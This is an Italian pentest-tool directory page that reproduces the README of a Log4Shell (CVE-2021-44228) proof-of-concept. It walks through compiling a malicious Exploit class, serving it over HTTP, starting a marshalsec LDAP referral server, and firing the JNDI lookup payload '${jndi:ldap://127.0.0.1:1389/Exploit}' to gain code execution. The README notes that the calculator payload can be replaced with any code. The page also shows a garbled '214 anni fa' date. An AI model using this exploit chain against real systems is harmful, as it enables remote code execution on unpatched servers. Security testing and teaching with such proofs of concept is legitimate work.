Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-Log4Shell-POC — Proof-of-concept per Log4Shell (CVE-2021-44228) che dimostra l'esecuzione remota di codice basata su JNDI tramite server LDAP e HTTP. | Kitploit
Strumenti/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

Proof-of-concept per Log4Shell (CVE-2021-44228) che dimostra l'esecuzione remota di codice basata su JNDI tramite server LDAP e HTTP.

Vedi Repository
214 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228-Log4Shell-POC

POC completo per la famigerata Log4j CVE-2021-44228

Prerequisiti

  • Scarica e installa Java da qui, puoi usare jdk-8u181.
  • Installa IntelliJ Idea da qui

POC

  • Passo 1 : Clona questo repository.
  • Passo 2 : Sposta il file Exploit.java in una cartella diversa. Come nel mio caso, ho creato una cartella rce nella home directory. /home/coldfusionx/rce

mov

  • Passo 3 : Dai un'occhiata a Exploit.java Qui puoi cambiare il codice remoto con qualsiasi cosa, in questo caso farebbe apparire su una macchina ubuntu.
gnome-calculator

exp

  • Passo 4 : Successivamente dobbiamo compilare Exploit.java usando il comando javac Exploit.java, una volta compilato con successo dovremmo vedere che viene creato un nuovo file Exploit.class.

com

  • Passo 5 : Avvia un server http python per ospitare Exploit.class usando python3 -m http.server 8888, in alternativa puoi anche usare un server php con il comando php -S 127.0.0.1:8888.

sv

  • Passo 6 : Carica i file del progetto in IntelliJ Idea e lascia che maven completi l'indicizzazione dei file. Una volta completato, il tuo progetto dovrebbe apparire così :

poc1

  • Passo 7 : Per eseguire il progetto, dobbiamo creare una configurazione, clicca su Add Configuration

poc2

root@kitploit:~
1. Seleziona `Application`

poc3

root@kitploit:~
2. Seleziona la classe principale

main

root@kitploit:~
3. Seleziona il JDK e applica.

poc4

root@kitploit:~
4. Dovresti vedere l'Applicazione Log4j creata, pronta per essere eseguita.

poc5

  • Passo 8 : Successivamente avviamo il LDAPRefServer usando marshalsec :
  • cd marshasec
  • Esegui java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" per avviare il server LDAP, qui 127.0.0.1:8888 è il server python che ospita Exploit.class quindi specifichiamo /#Exploit

ldap

  • Passo 9 : Modifica il payload JNDI in log4j.java secondo le tue esigenze, logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); In questo caso stiamo caricando la classe remota Exploit, il server di riferimento LDAP reindirizzerà la richiesta al nostro server python che ospita la classe Exploit dannosa.

  • Passo 10 : Esegui Log4j, al termine dell'esecuzione con successo dovresti vedere apparire una calcolatrice gnome.

rce

Dai un'occhiata alla mia analisi dettagliata su Log4Shell CVE-2021-44228

Riferimento

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Scarica lo strumento